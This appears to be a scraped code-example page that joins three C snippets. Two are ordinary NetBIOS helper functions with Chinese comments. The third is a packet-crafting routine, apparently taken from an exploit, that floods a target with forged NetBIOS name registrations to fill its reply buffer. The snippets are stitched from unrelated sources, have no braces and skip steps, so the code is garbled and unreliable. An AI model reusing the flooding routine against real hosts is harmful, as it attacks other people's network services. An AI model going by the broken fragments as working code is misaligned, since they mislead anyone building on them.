예제 #1
// 向本地名字表中添加名字
BOOL NBAddName (int nLana, LPCSTR szName)
    NCB ncb;
    memset (&ncb, 0, sizeof (ncb));		// 清空ncb结构体
    ncb.ncb_command = NCBADDNAME;		// 执行NCBDDNAME命令,向本地名字表中添加一个唯一的名字
    ncb.ncb_lana_num = nLana;			// 设置lana_num资源,指定本地网络名字编号。
	MakeNetbiosName ((char*) ncb.ncb_name, szName); // 将szName赋值到ncb.ncb_name中
    Netbios (&ncb);						// 执行NCBRESET命令
    NBCheck (ncb);						// 如果执行结果不正确,则输出ncb.ncb_retcode
	// 如果成功返回TRUE,否则返回FALSE
    return (NRC_GOODRET == ncb.ncb_retcode);
예제 #2
// 获取指定LANA的网络适配器信息
// nLana, LANA编号
// pBuffer, 获取到的网络适配器缓冲区
// cbBuffer, 缓冲区长度
// szName, 主机名字
BOOL NBAdapterStatus (int nLana, PVOID pBuffer, int cbBuffer,  LPCSTR szName)
    NCB ncb;
    memset (&ncb, 0, sizeof (ncb));		// 清空ncb结构体
    ncb.ncb_command = NCBASTAT;			// 设置执行NCBASTAT命令,获取本地或远程网络适配器的状态
    ncb.ncb_lana_num = nLana;			// 设置LANA编号

    ncb.ncb_buffer = (PUCHAR) pBuffer;	// 将获取到的数据保存到参数pBuffer中
    ncb.ncb_length = cbBuffer;			// 设置缓冲区长度

    MakeNetbiosName ((char*) ncb.ncb_callname, szName);// 设置参数ncb.ncb_callname
    Netbios (&ncb);						// 执行NetBIOS命令
    NBCheck (ncb);						// 如果执行不成功,则输出返回值
	// 如果成功返回TRUE,否则返回FALSE
    return (NRC_GOODRET == ncb.ncb_retcode);
bool FillTargetList(int nSd, unsigned int nPacketCount)
	// this is the original packet
	const unsigned char * sPacket = "\x00\x00" //ID
					"\x79\x00" //FLAGS
					"\x00\x01" //QUERIES
					"\x00\x00" //ANSWERS
					"\x00\x00" //AUTHORITHY RRS
					"\x00\x01" //ADDITIONAL RRS
					"\x20" // host start
					//!invalid host name (32 bytes from offset 0Dh - 2Dh)
					"\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41" // netbios host name
					"\x42\x4C" // host type
					"\x00" // end
					"\x00\x20"//TYPE NB
					"\x00\x01"//CLASS IN
					//Additional RRS
					"\x00\x20"//TYPE NB
					"\x00\x01"//CLASS IN
					"\x00\x00\x00\x78" //TTL
					"\x00\x06" // DATA Length
					"\x40\x00" // NB FLAGS
					"\xC8\xA8\x00\x00" // NB ADDRESS 192.168.x.x
					; //Total length 68 bytes
	// In order to fill up the reply buffer we need 96 netbios names with <1b> address on target machine
	unsigned char szWorkerPacket[68];
	int i = 0;
	unsigned char nIpNet = 0, nIpHost = 0;
	unsigned short nIdBase = rand();
	char szName[16], szNbName[31];
	szNbName[30] = 0x0; // just for printing purposes set term byte to 0x00
	printf("[*] Sending %u packets, sleeping 3 seconds after 32 packets sent\n", nPacketCount);
	printf("-> ");
	for(i = 0; i < nPacketCount; i++)
		// copy packet template
		memcpy(szWorkerPacket, sPacket, 68);
		// insert 2 byte id at offset 00h
		memcpy(szWorkerPacket, &nIdBase, 2);
		// gen rand name
		// tanslate into netbios format
		MakeNetbiosName(szName, szNbName);
		// insert name into the packet at offset 0D
		memcpy(szWorkerPacket + 0x0D, szNbName, 0x1E);
		// insert IP network part at offset 42h
		nIpNet = i / 255;
		memcpy(szWorkerPacket + 0x42, &nIpNet, 0x01);
		// insert IP host part at offset 43h, use value of i
		nIpHost = i % 255;
		memcpy(szWorkerPacket + 0x43, &nIpHost, 0x01);
		// increment id
		//!Packet ready, lets send
		write(nSd, szWorkerPacket, 68);
		if((i + 1) % 32 == 0)
	printf("\n[*] Done, sent %u packets\n", nPacketCount);